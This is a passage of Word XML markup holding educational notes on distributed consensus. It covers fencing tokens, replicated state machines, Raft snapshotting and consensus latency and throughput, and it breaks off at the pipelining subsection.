    </w:p>
    <w:p w14:paraId="21A44A13" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Fencing Tokens (Preventing Stale Leaders)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA7712" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A76C1E9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Problem: Old leader's lease expires (GC pause, network partition).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F9CF5A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  New leader elected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12948305" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Old leader "wakes up" — still thinks it's the leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667309B1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Both try to write to shared resource → data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6647B1F3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="6782B1A2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Solution: Fencing tokens (monotonically increasing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE58572" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="4F3D27FA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Election 1: Leader A gets fencing token = 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833792F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Election 2: Leader B gets fencing token = 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BCF855" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="118FC340" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Shared resource (database, storage) checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53423714" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  "Only accept writes with token ≥ last seen token"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E47E963" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D13CC1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Leader A (token 7) tries to write → rejected (last seen token = 8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51147E05" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t>Leader B (token 8) writes → accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3371B7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="429E4289" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Implementation in etcd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6B5F6E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Lease creation returns a lease ID (monotonically increasing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E38DABF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Use lease ID as fencing token when accessing shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762CBEC7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="08939E4F">
          <v:rect id="_x0000_i6246" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9FDFFD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Consensus for Replicated State Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6960C4F3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 The Replicated State Machine Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40708887" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38326C40" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>The most important application of consensus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F987D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="3139A098" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>All nodes maintain the SAME state by applying the SAME log of commands in the SAME order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2AF01" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="4F9078CA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>┌──────────────┐    ┌──────────────┐    ┌──────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7476C126" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│   Node 1     │    │   Node 2     │    │   Node 3     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADCB636" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│              │    │              │    │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5046DC34" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│ Log:         │    │ Log:         │    │ Log:         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497AA5A2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│ [1: SET X=1] │    │ [1: SET X=1] │    │ [1: SET X=1] │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01312387" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│ [2: SET Y=2] │    │ [2: SET Y=2] │    │ [2: SET Y=2] │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552CA631" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│ [3: SET X=5] │    │ [3: SET X=5] │    │ [3: SET X=5] │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF08FD4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│              │    │              │    │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CA77C8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│ State:       │    │ State:       │    │ State:       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2961FD3D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│ X=5, Y=2    │    │ X=5, Y=2    │    │ X=5, Y=2    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3CCEE0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>└──────────────┘    └──────────────┘    └──────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD92650" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="079FBB16" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t>Consensus ensures: all nodes have the same log (same entries at same positions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D8DD50" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Same log + same starting state + deterministic state machine = same state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAF00E2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Log Compaction (Snapshotting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C1A821" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775BE582" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Problem: Log grows forever. New nodes would need to replay millions of entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B809F2B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="306700AD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Solution: Periodic snapshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A91AE55" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="41D9E9A4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>1. Node takes snapshot of current state machine state at log index N.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE50EAB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Snapshot: {X=5, Y=2, Z=10, ...} at index 100000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7170AB02" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="0A5D535B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>2. Discard all log entries ≤ N.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395385A1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Log now starts at index 100001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A3479" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="57FBEEA1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>3. New/recovering node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FE8D2C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Receive snapshot → load state → replay log entries after snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7AC666" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Much faster than replaying from the beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A02CE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="6BEA8B2D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>In Raft:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA1E3B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Leader sends InstallSnapshot RPC to far-behind followers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73969206" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Follower replaces its state with the snapshot + continues from there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726CF327" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="222CFCD7">
          <v:rect id="_x0000_i6247" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B90C7D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Consensus Performance and Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E20F1D9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EAF4E3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C18740" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Raft/Paxos write latency (minimum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E737A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  = Time for leader to receive request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2750BEE7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  + Time to write to local log (persistent storage — fsync)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB86481" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  + Time to replicate to majority (1 network round trip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF498BB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  + Time for majority to write to THEIR persistent storage (fsync)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25941F0B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E77AC0F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Same-datacenter (nodes 1ms apart):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101084BB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Write latency ≈ 2× fsync (~0.5ms each) + 1ms network = ~2ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C0C622" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="527DFC23" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Cross-region (nodes 50ms apart):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463EB93C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Write latency ≈ 2× fsync + 50ms network = ~51ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F550990" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5CC031" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Optimization: Batching multiple client requests into a single log entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D45DA69" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  1000 requests batched → 1 consensus round → amortized latency per request is low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD8DA56" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493D2089" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4915F505" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Factors limiting throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65A511" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  1. Disk I/O: Each consensus round requires fsync (for durability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587A7EBA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     SSD fsync: ~50μs → theoretical max: ~20,000 rounds/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5C8194" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     With batching: 100 requests/batch × 20,000 batches/sec = 2,000,000 ops/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE40D10" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D61A38" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  2. Network: Large log entries (big values) saturate NIC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B8B67B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     1 Gbps NIC, 1 KB values: ~125,000 entries/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D41E3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     10 Gbps NIC: ~1,250,000 entries/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E155397" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7334B58C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  3. Leader bottleneck: All writes go through one node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4825B910" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">     Mitigated by: Multi-Raft (CockroachDB), partitioning (Kafka)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3988BB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="3C3F59AE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>etcd practical throughput: 10,000-50,000 writes/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656049B1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>CockroachDB (multi-raft): 100,000+ writes/sec (across many ranges)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F7F134" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Optimizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED32ED" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pipelining:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C7A289" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B34619" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Don't wait for previous entry to commit before sending next:</w:t>
